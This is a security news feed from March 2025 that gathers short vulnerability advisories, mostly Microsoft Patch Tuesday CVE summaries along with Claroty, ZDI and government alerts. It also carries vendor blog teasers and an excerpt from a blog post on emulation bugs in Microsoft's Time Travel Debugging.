Detecting and Mitigating the Apache Camel Vulnerabilities
2025-03-11T16:00:00Z | 1741708800

Akamai researchers have created detection scripts and additional details for the Apache Camel vulnerabilities CVE-2025-27636 and CVE-2025-29891.

https://www.akamai.com/blog/security-research/2025/mar/march-apache-camel-vulnerability-detections-and-mitigations
What Is Runtime Exploit Prevention? Securing Embedded Software with RASP
2025-03-11T14:26:15Z | 1741703175

Critical infrastructure today is powered by software. The need to secure millions of lines of code in embedded systems deployed in ICS/OT environments, the automotive industry, defense, and more has never been more urgent.  Embedded systems in these industries often run on legacy devices and have lengthy lifespans, making patching and regular security scanning and […] The post What Is Runtime Exploit Prevention? Securing Embedded Software with RASP appeared first on RunSafe Security.

https://runsafesecurity.com/blog/runtime-exploit-prevention-rasp/
March Security Update
2025-03-11T14:05:02Z | 1741701902

Ivanti’s vulnerability management program is a central part of our commitment to security. We employ rigorous testing and validation methodologies to enable swift identification, patching, and disclosure of vulnerabilities in collaboration with the broader security ecosystem. Our priority is to provide responsible and transparent communication to our customers, so they are empowered to defend their environments. In recent months, we have intensified our internal scanning, manual exploitation and testing capabilities, and have also made enhancements to our responsible disclosure process so that we promptly discover and address potential issues, and so that our customers are best equipped to take action. Ivanti releases standard security patches on the second Tuesday of every month. For many of our customers, the predictable schedule facilitates better planning and management of IT resources, allowing them to allocate time and personnel efficiently for the timely updates. It is important for customers to know: We have no evidence of any of these vulnerabilities being exploited in the wild. These vulnerabilities do not impact any other Ivanti solutions. More information on these vulnerabilities and detailed instructions on how to remediate the issues can be found in these Security Advisories: Ivanti Neurons for MDM Ivanti Secure Access Client (ISAC) Our Support team is always available to help customers and partners should they have any questions. Cases can be logged via the Success portal (login credentials required). Want to stay up to date on Ivanti Security Advisories? Paste https://www.ivanti.com/blog/topics/security-advisory/rss into your preferred RSS reader / functionality in your email program.

https://www.ivanti.com/blog/march-security-update
EMA Network Observability: Managing Performance Across Hybrid Networks
2025-03-11T13:55:02Z | 1741701302

Enterprise Management Associates (EMA) has published its 2025 “Network Observability: Managing Performance Across Hybrid Networks” report with a focus on how the network observability market has evolved. The industry has undergone a transformation from leveraging network monitoring or network performance management...

https://www.netscout.com/blog/ema-network-observability-managing-performance-across-hybrid
From Good to Great: Mastering Day-2 Network Security Policy
2025-03-11T13:00:00Z | 1741698000

https://www.akamai.com/blog/security/2025/mar/segmentation-network-security-policy-akamai-hunt
Clavister Secures 68 MSEK Contract from BAE Systems Hägglunds for CyberArmour to CV90
2025-03-11T12:09:15Z | 1741694955

11 March 2025 – Örnsköldsvik, Sweden – Clavister, a leader in European cybersecurity for mission-critical applications, today announced it has been awarded a 68 MSEK contract – with an option… Read more The post Clavister Secures 68 MSEK Contract from BAE Systems Hägglunds for CyberArmour to CV90 appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/clavister-secures-68-msek-contract-from-bae-systems-hagglunds-for-cyberarmour-to-cv90/
Don’t let cybercriminals steal your Spotify account
2025-03-11T10:00:00Z | 1741687200

Listen up, this is sure to be music to your ears – a few minutes spent securing your account today can save you a ton of trouble tomorrow

https://www.welivesecurity.com/en/cybersecurity/cybercriminals-steal-spotify-account/
Cato CTRL Threat Research: Ballista – New IoT Botnet Targeting Thousands of TP-Link Archer Routers
2025-03-11T09:46:40Z | 1741686400

Executive Summary Over the years, major IoT botnets like Mirai and Mozi have proven how easily routers can be exploited and threat actors have taken note. Two key issues have played in their favor: the fact that users rarely deploy new firmware to their routers, coupled with the lack of regard for security by router... The post Cato CTRL Threat Research: Ballista – New IoT Botnet Targeting Thousands of TP-Link Archer Routers   appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/
CVE-2025-2081
2025-03-11T08:08:00Z | 1741680480

CWE-547 USE OF HARD-CODED, SECURITY-RELEVANT CONSTANTS: Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 are vulnerable to an attacker impersonating the web application service and mislead victim clients. Optigo Networks recommends users to upgrade to the following: Visual BACnet Capture Tool: Version v3.1.3rc8 Optigo Visual Networks Capture Tool: Version v3.1.3rc8

https://claroty.com/team82/disclosure-dashboard/cve-2025-2081
CVE-2025-2080
2025-03-11T08:07:00Z | 1741680420

CWE-288 AUTHENTICATION BYPASS USING AN ALTERNATE PATH OR CHANNEL: Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 contain an exposed web management service that could allow an attacker to bypass authentication measures and gain controls over utilities within the products. Optigo Networks recommends users to upgrade to the following: Visual BACnet Capture Tool: Version v3.1.3rc8 Optigo Visual Networks Capture Tool: Version v3.1.3rc8

https://claroty.com/team82/disclosure-dashboard/cve-2025-2080
CVE-2025-2079
2025-03-11T08:06:00Z | 1741680360

CWE-547 USE OF HARD-CODED, SECURITY-RELEVANT CONSTANTS: Optigo Networks Visual BACnet Capture Tool and Optigo Visual Networks Capture Tool version 3.1.2rc11 contain a hard coded secret key. This could allow an attacker to generate valid JWT (JSON Web Token) sessions. Optigo Networks recommends users to upgrade to the following: Visual BACnet Capture Tool: Version v3.1.3rc8 Optigo Visual Networks Capture Tool: Version v3.1.3rc8

https://claroty.com/team82/disclosure-dashboard/cve-2025-2079
CVE-2022-30170 Windows Credential Roaming Service Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

In the Security Updates table added Windows Server 2022, 23H2 Edition (Server Core installation) as it is affected by this vulnerability. Microsoft recommends that customers install the updates to be fully protected from the vulnerability. Customers whose systems are configured to receive automatic updates do not need to take any further action.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30170
CVE-2024-30098 Windows Cryptographic Services Security Feature Bypass Vulnerability
2025-03-11T07:00:00Z | 1741676400

The following updates have been made to CVE-2024-30098: 1. In the Security Updates table, added all supported versions of the following as they are affected by this vulnerability: Windows 11 24H2 and Windows Server 2025. 2. To comprehensively address this vulnerability, Microsoft has released March 2025 security updates for all affected versions of Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, and Windows Server 2022 23H2 Edition, Windows 10, and Windows 11. 3. Updated the "Are there any further actions I need to take to be protected from this vulnerability?" FAQ to state that Starting with the April 2025, the fix will automatically generate an audit event in cases where the Cryptographic Service Provider (CSP) is being used with RSA keys. If you have not already enabled the fix using the DisableCapiOverrideForRSA setting, you should monitor your systems for any error events in the Windows system event log. See the FAQ section of this CVE for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30098
CVE-2024-49116 Windows Remote Desktop Services Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

To comprehensively address CVE-2024-49116, Microsoft has released March 2025 security updates for all supported editions of Windows Server 2016 and Windows Server 2019. Microsoft recommends that customers install the updates to be fully protected from the vulnerability. Customers whose systems are configured to receive automatic updates do not need to take any further action.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49116
CVE-2025-26634 Windows Core Messaging Elevation of Privileges Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26634
ADV990001 Latest Servicing Stack Updates
2025-03-11T07:00:00Z | 1741676400

Advisory updated to announce new versions of Servicing Stack Updates are available. Please see the FAQ for details.

https://msrc.microsoft.com/update-guide/vulnerability/ADV990001
CVE-2025-26645 Remote Desktop Client Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Relative path traversal in Remote Desktop Client allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26645
CVE-2025-26633 Microsoft Management Console Security Feature Bypass Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper neutralization in Microsoft Management Console allows an unauthorized attacker to bypass a security feature locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633
CVE-2025-26631 Visual Studio Code Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Uncontrolled search path element in Visual Studio Code allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26631
CVE-2025-26630 Microsoft Access Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Office Access allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26630
CVE-2025-26629 Microsoft Office Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26629
CVE-2025-26627 Azure Arc Installer Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper neutralization of special elements used in a command ('command injection') in Azure Arc allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26627
CVE-2025-24049 Azure Command Line Integration (CLI) Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper neutralization of special elements used in a command ('command injection') in Azure Command Line Integration (CLI) allows an unauthorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24049
CVE-2025-24994 Microsoft Windows Cross Device Service Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper access control in Windows Cross Device Service allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24994
CVE-2025-24993 Windows NTFS Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24993
CVE-2025-24992 Windows NTFS Information Disclosure Vulnerability
2025-03-11T07:00:00Z | 1741676400

Buffer over-read in Windows NTFS allows an unauthorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24992
CVE-2025-24991 Windows NTFS Information Disclosure Vulnerability
2025-03-11T07:00:00Z | 1741676400

Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24991
CVE-2025-24985 Windows Fast FAT File System Driver Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Integer overflow or wraparound in Windows Fast FAT Driver allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24985
CVE-2025-24984 Windows NTFS Information Disclosure Vulnerability
2025-03-11T07:00:00Z | 1741676400

Insertion of sensitive information into log file in Windows NTFS allows an unauthorized attacker to disclose information with a physical attack.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24984
CVE-2025-24983 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24983
CVE-2025-24084 Windows Subsystem for Linux (WSL2) Kernel Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Untrusted pointer dereference in Windows Subsystem for Linux allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24084
CVE-2025-24076 Microsoft Windows Cross Device Service Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper access control in Windows Cross Device Service allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24076
CVE-2025-24075 Microsoft Excel Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24075
CVE-2025-24072 Microsoft Local Security Authority (LSA) Server Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24072
CVE-2025-24071 Microsoft Windows File Explorer Spoofing Vulnerability
2025-03-11T07:00:00Z | 1741676400

Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071
CVE-2025-24067 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Microsoft Streaming Service allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24067
CVE-2025-24066 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24066
CVE-2025-24064 Windows Domain Name Service Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in DNS Server allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24064
CVE-2025-24061 Windows Mark of the Web Security Feature Bypass Vulnerability
2025-03-11T07:00:00Z | 1741676400

Protection mechanism failure in Windows Mark of the Web (MOTW) allows an unauthorized attacker to bypass a security feature locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24061
CVE-2025-24059 Windows Common Log File System Driver Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Incorrect conversion between numeric types in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24059
CVE-2025-24056 Windows Telephony Service Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Windows Telephony Server allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24056
CVE-2025-24055 Windows USB Video Class System Driver Information Disclosure Vulnerability
2025-03-11T07:00:00Z | 1741676400

Out-of-bounds read in Windows USB Video Driver allows an authorized attacker to disclose information with a physical attack.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24055
CVE-2025-24054 NTLM Hash Disclosure Spoofing Vulnerability
2025-03-11T07:00:00Z | 1741676400

External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054
CVE-2025-24051 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24051
CVE-2025-24050 Windows Hyper-V Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Role: Windows Hyper-V allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24050
CVE-2025-24048 Windows Hyper-V Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Role: Windows Hyper-V allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24048
CVE-2025-24046 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Streaming Service allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24046
CVE-2025-24045 Windows Remote Desktop Services Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Sensitive data storage in improperly locked memory in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24045
CVE-2025-21199 Azure Agent Installer for Backup and Site Recovery Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper privilege management in Azure Agent Installer allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21199
CVE-2025-21247 MapUrlToZone Security Feature Bypass Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper resolution of path equivalence in Windows MapUrlToZone allows an unauthorized attacker to bypass a security feature over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21247
CVE-2025-25008 Windows Server Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper link resolution before file access ('link following') in Microsoft Windows allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25008
CVE-2025-25003 Visual Studio Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Uncontrolled search path element in Visual Studio allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25003
CVE-2025-24998 Visual Studio Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Uncontrolled search path element in Visual Studio allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24998
CVE-2025-24997 DirectX Graphics Kernel File Denial of Service Vulnerability
2025-03-11T07:00:00Z | 1741676400

Null pointer dereference in Windows Kernel Memory allows an authorized attacker to deny service locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24997
CVE-2025-24996 NTLM Hash Disclosure Spoofing Vulnerability
2025-03-11T07:00:00Z | 1741676400

External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24996
CVE-2025-24995 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24995
CVE-2025-21180 Windows exFAT File System Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Windows exFAT File System allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21180
CVE-2025-24988 Windows USB Video Class System Driver Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Out-of-bounds read in Windows USB Video Driver allows an authorized attacker to elevate privileges with a physical attack.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24988
CVE-2025-24987 Windows USB Video Class System Driver Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Out-of-bounds read in Windows USB Video Driver allows an authorized attacker to elevate privileges with a physical attack.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24987
CVE-2025-24986 Azure Promptflow Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper isolation or compartmentalization in Azure PromptFlow allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24986
CVE-2025-24083 Microsoft Office Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Untrusted pointer dereference in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24083
CVE-2025-24082 Microsoft Excel Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24082
CVE-2025-24081 Microsoft Excel Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24081
CVE-2025-24080 Microsoft Office Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24080
CVE-2025-24079 Microsoft Word Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24079
CVE-2025-24078 Microsoft Word Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24078
CVE-2025-24077 Microsoft Word Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24077
CVE-2025-24070 ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Weak authentication in ASP.NET Core & Visual Studio allows an unauthorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24070
CVE-2025-24057 Microsoft Office Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24057
CVE-2025-24043 WinDbg Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Improper verification of cryptographic signature in .NET allows an authorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24043
CVE-2025-24044 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
2025-03-11T07:00:00Z | 1741676400

Use after free in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24044
CVE-2024-9157 Synaptics: CVE-2024-9157 Synaptics Service Binaries DLL Loading Vulnerability
2025-03-11T07:00:00Z | 1741676400

Information published.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-9157
CVE-2025-24035 Windows Remote Desktop Services Remote Code Execution Vulnerability
2025-03-11T07:00:00Z | 1741676400

Sensitive data storage in improperly locked memory in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24035
ZDI-25-127: (0Day) (Pwn2Own) Samsung SmartThings Improper Verification of Cryptographic Signature Authentication Bypass Vulnerability
2025-03-11T05:00:00Z | 1741669200

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Samsung SmartThings. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-2233.

http://www.zerodayinitiative.com/advisories/ZDI-25-127/
ZDI-25-128: NI G Web Development GWEBPROJECT File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability
2025-03-11T05:00:00Z | 1741669200

This vulnerability allows remote attackers to execute arbitrary code on affected installations of NI G Web Development. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12742.

http://www.zerodayinitiative.com/advisories/ZDI-25-128/
High Threat Security Alert (A25-03-09): Vulnerability in Apache Tomcat
2025-03-11T04:00:00Z | 1741665600

The Apache Software Foundation released security updates to address the vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-10): Multiple Vulnerabilities in Google Chrome
2025-03-11T04:00:00Z | 1741665600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
New SSRF Exploitation Surge Serves as a Reminder of 2019 Capital One Breach
2025-03-11T00:00:00Z | 1741651200

GreyNoise observed 400+ IPs exploiting multiple SSRF vulnerabilities across various platforms, with recent activity concentrated in Israel and the Netherlands.

https://www.greynoise.io/blog/new-ssrf-exploitation-surge
Unpacking Cross-Domain Technology: The Mechanics of Security and Efficiency
2025-03-10T21:26:38Z | 1741641998

Artificial Intelligence (AI) is transforming national security, defense, and critical industries. However, AI is only as effective as the data it processes, and flawed data can lead to dangerous outcomes without security, integrity, and reliability. In mission-critical environments, ensuring secure data transfer across different networks and classifications is essential. That’s where Cross-Domain Solutions (CDS) come... View Article The post Unpacking Cross-Domain Technology: The Mechanics of Security and Efficiency appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/cross-domain-technology-the-mechanics-of-security-and-efficiency/
“From our first experience with Secure64 and DNS Signer…”
2025-03-10T15:34:27Z | 1741620867

“From our first experience with Secure64 and DNS Signer, we knew we had found the right partner for The Agency,” said The Agency’s IT Specialist, “The company and all of their products were built to be secure because security was of primary importance to them. This resonated strongly with us, because security is critical to […]

https://secure64.com/2025/03/10/from-our-first-experience-with-secure64-and-dns-signer/
Most hacked passwords revealed as UK cyber survey exposes gaps in online security
2025-03-10T14:45:05Z | 1741617905

The NCSC's first 'UK cyber survey' published alongside global password risk list

https://www.ncsc.gov.uk/news/most-hacked-passwords-revealed-as-uk-cyber-survey-exposes-gaps-in-online-security
Vulnerability in PlotAI software
2025-03-10T14:00:00Z | 1741615200

Command Injection vulnerability (CVE-2025-1497) has been found in MLJAR PlotAI software.

https://cert.pl/en/posts/2025/03/CVE-2025-1497/
Unraveling Time: A Deep Dive into TTD Instruction Emulation Bugs
2025-03-10T14:00:00Z | 1741615200

Written by: Dhanesh Kizhakkinan, Nino Isakovic Executive Summary This blog post presents an in-depth exploration of Microsoft's Time Travel Debugging (TTD) framework, a powerful record-and-replay debugging framework for Windows user-mode applications. TTD relies heavily on accurate CPU instruction emulation to faithfully replay program executions. However, subtle inaccuracies within this emulation process can lead to significant security and reliability issues, potentially masking vulnerabilities or misleading critical investigations—particularly incident response and malware analysis. This could cause analysts to overlook threats or draw incorrect conclusions. Furthermore, attackers can exploit these inaccuracies to intentionally evade detection or disrupt forensic analyses, severely compromising investigative outcomes.  The blog post examines specific challenges, provides historical context, and analyzes real-world emulation bugs, highlighting the critical importance of accuracy and ongoing improvement to ensure the effectiveness and reliability of investigative tooling. Ultimately, addressing these emulation issues directly benefits users by enhancing security analyses, improving reliability, and ensuring greater confidence in their debugging and investigative processes. Overview We begin with an introduction to TTD, detailing its use of a sophisticated CPU emulation layer powered by the Nirvana runtime engine. Nirvana translates guest instructions into host-level micro-operations, enabling detailed capture and precise replay of a program's execution history. The discussion transitions into exploring historical challenges in CPU emulation, particularly for the complex x86 architecture. Key challenges include issues with floating-point and SIMD operations, memory model intricacies, peripheral and device emulation, handling of self-modifying code, and the constant trade-offs between performance and accuracy. These foundational insights lay the groundwork for our deeper examination of specific instruction emulation bugs discovered within TTD. These include: A bug involving the emulation of the pop r16, resulting in critical discrepancies between native execution and TTD instrumentation. An issue with the push segment instruction that demonstrates differences between Intel and AMD CPU implementations, highlighting the importance of accurate emulation aligned with hardware behavior Errors in the implementation of the lodsb and lodsw instructions, where TTD incorrectly clears upper bits that should remain unchanged. An issue within the WinDbg TTDAnalyze debugging extension, where a fixed output buffer resulted in truncated data during symbol queries, compromising debugging accuracy. Each case is supported by detailed analyses, assembly code proof-of-concept samples, and debugging traces, clearly illustrating the subtle but significant pitfalls in modern CPU emulation as it pertains to TTD. Additional bugs discovered beyond those detailed here are pending disclosure until addressed by Microsoft. All bugs discussed in this post have been resolved as of TTD version 1.11.410. Intro to TTD Time Travel Debugging (TTD) is a powerful usermode record-and-replay framework developed by Microsoft, originally introduced in a 2006 whitepaper under a different name. It is a staple for our workflows as it pertains to Windows environments. TTD allows a user to capture a comprehensive recording of a process (and potential child processes) during the lifetime of the process's execution. This is done by injecting a dynamic-link library (DLL) into the intended target process and capturing each state of the execution. This comprehensive historical view of the program's runtime behavior is stored in a database-like trace file (.trace), which, much like a database, can be further indexed to produce a corresponding .idx file for efficient querying and analysis. Once recorded, trace files can be consumed by a compatible client that supports replaying the entire execution history. In other words, TTD effectively functions as a record/replay debugger, enabling analysts to move backward and forward through execution states as if navigating a temporal snapshot of the program's lifecycle. TTD relies on a CPU emulation layer to accurately record and replay program executions. This layer is implemented by the Nirvana runtime engine, which simulates guest instructions by translating them into a sequence of simpler, host-level micro-operations. By doing so, Nirvana provides fine-grained control at the instruction and sub-instruction level, allowing instrumentation to be inserted at each stage of instruction processing (e.g., fetching, memory reads, writes). This approach not only ensures that TTD can capture the complete dynamic behavior of the original binary but also makes it possible to accurately re-simulate executions later. Nirvana's dynamic binary translation and code caching techniques improve performance by reusing translated sequences when possible. In cases where code behaves unpredictably—such as self-modifying code scenarios—Nirvana can switch to a pure interpretation mode or re-translate instructions as needed. These adaptive strategies ensure that TTD maintains fidelity and efficiency during the record and replay process, enabling it to store execution traces that can be fully re-simulated to reveal intricate details of the code's behavior under analysis. The TTD framework is composed of several core components: TTD: The main TTD client executable that takes as input a wide array of input arguments that dictate how the trace will be conducted. TTDRecord: The main DLL responsible for the recording that runs within the TTD client executable. It initiates the injection sequence into the target binary by injecting TTDLoader.dll. TTDLoader: DLL that gets injected into the guest process and initiates the recorder within the guest through the TTDRecordCPU DLL. It also establishes a process instrumentation callback within the guest process that allows Nirvana to monitor the egress of any system calls the guest makes. TTDRecordCPU: The recorder responsible for capturing the execution states into the .trace file. This is injected as a DLL into the guest process and communicates the status of the trace with TTDRecord. The core logic works by emulating the respective CPU. TTDReplay and TTDReplayClient: The replay components that read the captured state from the trace file and allow users to step through the recorded execution. Windbg uses these to provide support for replacing trace files. TTDAnalyze: A WinDbg extension that integrates with the replay client, providing exclusive TTD capacities to WinDbg. 